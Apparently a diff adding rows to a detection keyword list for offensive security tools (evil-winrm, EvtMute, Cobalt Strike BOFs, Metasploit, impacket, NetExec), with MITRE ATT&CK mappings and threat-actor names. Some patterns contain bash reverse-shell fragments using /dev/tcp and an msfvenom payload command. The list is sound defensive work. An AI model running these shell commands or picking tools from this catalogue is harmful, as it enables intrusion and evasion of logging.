+"*evil-winrm -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*evil-winrm*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. 
The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","1","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
+"*EvtMuteHook.dll*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z"
+"*EvtMuteHook.dll*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z"
+"*EvtMuteHook.iobj*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z"
+"*EvtMuteHook.ipdb*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - 
TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z"
+"*EvtMuteHook.pdb*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z"
+"*EvtMuteHook.sln*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z"
+"*EvtMute-master*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z"
+"*EVUAC *.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","0","N/A","10","10","130","29","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z"
+"*ewby/Mockingjay_BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z"
+"*ewok -t *","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ewok (snmpwalk like)","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/wolf-project/NSA-TOOLS-SHADOW-BROKERS","1","0","N/A","N/A","1","32","17","2017-04-20T16:24:49Z","2017-05-13T19:51:23Z"
+"*example-bof.sln*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z"
+"*examples/netview.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*Excel-Exploit.git*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z"
+"*Excel-Exploit-main*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation 
tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z"
+"*ExcelReflectImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*excelshellinject.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
+"*exchange_proxylogon_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*exchange_proxynotshell_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*exe_dll_shellcode genetic.config*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z"
+"*exe_stager.exe*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*exe_to_dll.exe*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z"
+"*exe_to_dll.exe*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z"
+"*exe_to_dll_*.zip*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z"
+"*exe_to_dll_*_32bit.zip*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z"
+"*exe_to_dll_*_64bit.zip*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z"
+"*exe_to_dll-master*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z"
+"*exe_to_dll-master*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z"
+"*exe2bat.cpp*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z"
+"*exe2bat.exe*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z"
+"*exe2powershell.cpp*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z"
+"*exe2powershell.exe*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z"
+"*exe2powershell-master*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z"
+"*exec /bin/sh 0&0 2>&0*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z"
+"*exec 5<>/dev/tcp/*/**cat <&5 | while read line* do $line 2>&5 >&5* done*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive 
!","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z"
+"*exec CMD=/bin/sh -f elf -o *.elf*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*Exec_Command_Silent.vbs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*Exec_Command_WithOutput.vbs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*exec_payload_msi*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*exec_shellcode.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*ExecCmdImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*Exec-Command-Silent.vbs*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z"
+"*--exec-method smbexec*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*execmethod*PowerPick*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
+"*execmethod*PowerShell*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
+"*execPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z"
+"*Executable_Files-main.zip*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*execute_assembly -Assembly *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - 
TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
+"*execute_assembly SharpCloud*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z"
+"*execute_bof *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" 
+"*execute_dotnet_assembly.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*execute_pe -PE*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
